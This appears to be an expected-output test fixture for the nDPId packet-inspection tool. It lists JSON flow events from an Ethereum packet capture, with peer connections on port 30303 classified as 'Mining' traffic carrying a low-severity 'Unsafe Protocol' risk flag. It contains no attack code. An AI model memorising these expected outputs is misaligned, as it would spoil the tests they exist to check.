00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.GoogleCloud","breed":"Acceptable","category":"Cloud"}}
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1578508365271,"flow_last_seen":1578508365838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":1762,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1578508365279,"flow_last_seen":1578508366038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1578508364714,"flow_last_seen":1578508364919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1578508365300,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":1177,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365154,"flow_last_seen":1578508365257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1578508364523,"flow_last_seen":1578508364687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":1846,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508365194,"flow_last_seen":1578508366069,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00764{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508364937,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":470,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508364523,"flow_last_seen":1578508365656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.GoogleCloud","breed":"Acceptable","category":"Cloud"}}
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1578508365271,"flow_last_seen":1578508365838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":1762,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1578508365279,"flow_last_seen":1578508366038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1578508364714,"flow_last_seen":1578508364919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1578508365300,"flow_last_seen":1578508366073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":1177,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365154,"flow_last_seen":1578508365257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364654,"flow_last_seen":1578508364729,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1578508365079,"flow_last_seen":1578508365297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":1734,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508365169,"flow_last_seen":1578508365272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1578508365079,"flow_last_seen":1578508365297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":1734,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508365169,"flow_last_seen":1578508365272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365461,"flow_last_seen":1578508365899,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1578508364523,"flow_last_seen":1578508365354,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1578508364522,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365331,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1578508364523,"flow_last_seen":1578508365354,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1578508364522,"flow_last_seen":1578508364841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364519,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508365097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508365097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364421,"flow_last_seen":1578508364694,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
